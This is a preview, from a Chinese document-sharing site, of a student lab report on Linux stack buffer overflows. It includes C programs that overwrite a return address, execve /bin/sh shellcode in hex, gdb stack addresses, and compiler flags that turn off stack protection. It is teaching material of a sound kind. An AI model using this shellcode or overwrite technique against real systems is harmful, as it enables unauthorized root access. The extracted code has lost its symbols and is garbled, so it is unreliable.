linux緩沖區(qū)溢出實(shí)驗(yàn).doc_第1頁
linux緩沖區(qū)溢出實(shí)驗(yàn).doc_第2頁
linux緩沖區(qū)溢出實(shí)驗(yàn).doc_第3頁
linux緩沖區(qū)溢出實(shí)驗(yàn).doc_第4頁
linux緩沖區(qū)溢出實(shí)驗(yàn).doc_第5頁
免費(fèi)預(yù)覽已結(jié)束,剩余9頁可下載查看

下載本文檔

版權(quán)說明:本文檔由用戶提供并上傳,收益歸屬內(nèi)容提供方,若內(nèi)容存在侵權(quán),請(qǐng)進(jìn)行舉報(bào)或認(rèn)領(lǐng)

文檔簡介

緩沖區(qū)溢出攻擊實(shí)驗(yàn)【實(shí)驗(yàn)要求】1)基本要求:編寫一個(gè)能實(shí)現(xiàn)緩沖區(qū)溢出(整數(shù)溢出或堆棧溢出)的程序。語言不限(c,c+,c#,java等均可),環(huán)境也不限(linux或windows等)。并在調(diào)試狀態(tài)下(如linux的gdb或其他集成開發(fā)環(huán)境的調(diào)試命令)查看寄存器和相應(yīng)存儲(chǔ)單元內(nèi)容的變化情況。分析并解釋緩沖區(qū)溢出的原因。提交:分析文檔(要給出調(diào)試過程和運(yùn)行過程中的一些必要的截圖),源代碼等。 2)提高要求:在上述溢出的情況下,改寫ret地址,增加shellcode代碼,實(shí)現(xiàn)本地或遠(yuǎn)程管理員權(quán)限的非授權(quán)訪問。例:一個(gè)簡單的shellcode程序:/* linux下的一個(gè)程序*/ include void main() char *name2; name0=/bin/sh; name1=NULL; execve(name0,name,NULL); 也可用gdb對(duì)其反匯編(主要分析execve和exit函數(shù)調(diào)用的機(jī)器指令),獲得相關(guān)的匯編代碼,進(jìn)一步處理為16進(jìn)制機(jī)器代碼,形如char shellcode=xebxlf.binsh;然后利用strcpy等脆弱性函數(shù)植入shellcode.【實(shí)驗(yàn)原理】實(shí)驗(yàn)主要是利用getchar()等脆弱性函數(shù)在執(zhí)行時(shí)沒有檢查緩沖區(qū)長度的特性,通過往程序的緩沖區(qū)寫超出其長度的內(nèi)容,造成緩沖區(qū)的溢出,從而破壞程序的堆棧,造成程序崩潰或使程序轉(zhuǎn)而執(zhí)行其它指令,以達(dá)到攻擊的目的。1、 局部變量與堆棧的關(guān)系在一個(gè)程序中,會(huì)聲明各種變量。靜態(tài)全局變量是位于數(shù)據(jù)段并且在程序開始運(yùn)行的時(shí)候被初始化,而局部變量則在堆棧中分配,只在該函數(shù)內(nèi)部有效。如果局部變量使用不當(dāng),會(huì)造成緩沖區(qū)溢出漏洞。例如,以下程序?qū)?huì)由于getchar()沒有檢查緩沖區(qū),導(dǎo)致輸入溢出:#include int main()char ch3;int i = 0;while(chi+ = getchar() != n);printf(i = %d %sn, i, ch);return 0;2、 利用堆棧溢出運(yùn)行攻擊代碼攻擊的最關(guān)鍵在于利用緩沖區(qū)溢出部分的數(shù)據(jù)覆蓋堆棧,用特定的地址替換堆棧中的返回地址,這樣當(dāng)函數(shù)調(diào)用返回的時(shí)候就會(huì)把我們替換的返回地址彈出到當(dāng)前基址,繼續(xù)執(zhí)行就會(huì)轉(zhuǎn)入我們想要跳轉(zhuǎn)的地址執(zhí)行事先設(shè)定好的代碼段了?!緦?shí)驗(yàn)環(huán)境】操作系統(tǒng): Ubuntu 10.10GDB版本:Ubuntu/Linaro 7.2-1ubuntu11 i686-linux-gnuCPU型號(hào):AM 245【實(shí)驗(yàn)過程】1、 基礎(chǔ)演示緩沖區(qū)溢出1 #include 2 int i = 0; 3 void attack() 4 5 printf(hello, thiss attack functionn); 6 7 void get() 8 9 int a = 0; 10 unsigned char ch3; 11 int *ret = 0; 12 printf(%xn%xn, &a, &ch); 13 /while(chi+ = getchar() != n); 14 /while(scanf(%d, chi+); 15 while( i 8) % 256; 19 chi+ = (char)(int)&attack 16) % 256; 20 chi+ = (char)(int)&attack 24) % 256; 21 printf(i = %d %d %sn, i, a, ch); 22 /ret = &i + 5; 23 /*ret -= 12; 24 /return 0; 25 26 27 int main() 28 29 /int i = 0; 30 get(); 31 printf(hellon); 32 printf(%dn, i); 33 return 0; 34 對(duì)exp_flow.c進(jìn)行編譯:gcc -g -fno-stack-protector -z execstack -o flow1 exp_flow1.cobjdump -d flow1 /對(duì)flow1進(jìn)行反匯編堆棧:高位地址 參數(shù)1參數(shù)2.參數(shù)n函數(shù)返回地址 0xbffff28cebpebx(在棧里分配 0x24個(gè)位置).esp-0xc 0xbffff27c (int *ret)esp-0x10 0xbffff278 (int a) esp-0x13 0xbffff275 (char ch3) 低位地址(gdb) print /x &a /int a 的地址$6 = 0xbffff278(gdb) print /x &ch /char ch3 數(shù)組的首地址$7 = 0xbffff275(gdb) print /x &ret /int *ret 的地址$8 = 0xbffff27cvoid get();/函數(shù)的返回地址為:0x080483fr1718行是數(shù)組溢出到get()的返回地址的所在棧位置處(0xbffff28c),所以用函數(shù)attack()的入口地址來覆蓋get() 的返回地址的棧位置的值,即把返回地址改為指向attack()函數(shù)的入口地址。執(zhí)行結(jié)果如下,跳到了attack()的入口地址去了,溢出成功。2、 緩沖區(qū)溢出執(zhí)行shellcode源碼:#include #include int i = 0;void get() int a = 0; int b = 0; int *ret = 0; unsigned char ch46 = xebx1f x5e x89x76x08 x31xc0 x88x46x07 x89x46x0c xb0x0b x89xf3 x8dx4ex08 x8dx56x0c xcdx80 x31xdb x89xd8 x40 xcdx80 xe8xdcxffxffxff /bin/sh ; printf(%xn%xn, &ret, &ch); ret = &ch70; /一直溢出到返回地址,中間省略了其它填充代碼。*ret = (int)ch; /修改返回地址,讓其指向數(shù)組ch的首地址。printf(%dn, strlen(ch); int main() get(); printf(hellon); printf(%dn, i); return 0; shellcode必須放在一個(gè)空間,而且這個(gè)空間沒有溢出,不然會(huì)出錯(cuò)。執(zhí)行結(jié)果:實(shí)驗(yàn)所遇到的問題:#include #include int i = 0;const unsigned char shellcode =x31xc0 x50 x68/sh x68/bin x89xe3 x50 x53 x89xe1 x99 xb0x0b xcdx80;void attack()printf(hello, thiss attack functionn);void get()int a = 0;int b = 0;int c = 0;unsigned char ch4;int *ret = 0;unsigned char code =xebx1f x5e x89x76x08 x31xc0 x88x46x07 x89x46x0c xb0x0b x89xf3 x8dx4ex08 x8dx56x0c xcdx80 x31xdb x89xd8 x40 xcdx80 xe8xdcxffxffxff /bin/sh;printf(%xn%xn, &ret, &ch);memcpy(ch, shellcode, sizeof(shellcode);i = strlen(shellcode)+4;chi+ = (char)(int)(&ch) % 256;chi+ = (char)(int)(&ch) 8) % 256;chi+ = (char)(int)(&ch) 16) % 256;chi = (char)(int)(&ch) 24) % 256; memset(ch + i + 1,0x41,100);/ret = &chi-3;/*ret = (int)code;printf(%dn, strlen(ch);/(void(*)()&ch)();int main()get();printf(hellon);printf(%dn, i);return 0;執(zhí)行結(jié)果出錯(cuò),段錯(cuò)誤:gdb中查看內(nèi)存結(jié)果如下:ch數(shù)組的首地址為:0xbffff270get()的返回地址在0xbffff28c ,但被正確修改指向ch的首地址了中間溢出的結(jié)果如下。從ch的首地址0xbffff270一直到0xbfff287,共24byte,都是存放著shellcode,gdb調(diào)試結(jié)果,如下錯(cuò)誤出現(xiàn)在0xbffff280.問題求解過程:一直想不明白這是為什么。已經(jīng)把get()的函數(shù)返回地址指到數(shù)組ch(4byte)的首地址,然后用shellcode的內(nèi)容一直溢出,把int a, int b, int c 都覆蓋掉,一直覆蓋到函數(shù)返回地址的前4個(gè)byte,再修改返回地址,指向ch的首地址。后來發(fā)現(xiàn),原來是 shellcode不正確,換成其它shellcode就可以正確跑起來了。#include #include int i = 0;void get() int a6; unsigned char ch10; /int *ret = 0; unsigned char code = xebx1f x5e x89x76x08 x31xc0 x88x46x07 x89x46x0c xb0x0b x89xf3 x8dx4ex08 x8dx56x0c xcdx80 x31xdb x89xd8 x40 xcdx80 xe8xdcxffxffxff /bin/sh ; memcpy(ch, code, sizeof(code); i = sizeof(code); chi+ = (char)(

溫馨提示

  • 1. 本站所有資源如無特殊說明,都需要本地電腦安裝OFFICE2007和PDF閱讀器。圖紙軟件為CAD,CAXA,PROE,UG,SolidWorks等.壓縮文件請(qǐng)下載最新的WinRAR軟件解壓。
  • 2. 本站的文檔不包含任何第三方提供的附件圖紙等,如果需要附件,請(qǐng)聯(lián)系上傳者。文件的所有權(quán)益歸上傳用戶所有。
  • 3. 本站RAR壓縮包中若帶圖紙,網(wǎng)頁內(nèi)容里面會(huì)有圖紙預(yù)覽,若沒有圖紙預(yù)覽就沒有圖紙。
  • 4. 未經(jīng)權(quán)益所有人同意不得將文件中的內(nèi)容挪作商業(yè)或盈利用途。
  • 5. 人人文庫網(wǎng)僅提供信息存儲(chǔ)空間,僅對(duì)用戶上傳內(nèi)容的表現(xiàn)方式做保護(hù)處理,對(duì)用戶上傳分享的文檔內(nèi)容本身不做任何修改或編輯,并不能對(duì)任何下載內(nèi)容負(fù)責(zé)。
  • 6. 下載文件中如有侵權(quán)或不適當(dāng)內(nèi)容,請(qǐng)與我們聯(lián)系,我們立即糾正。
  • 7. 本站不保證下載資源的準(zhǔn)確性、安全性和完整性, 同時(shí)也不承擔(dān)用戶因使用這些下載資源對(duì)自己和他人造成任何形式的傷害或損失。

最新文檔

評(píng)論

0/150

提交評(píng)論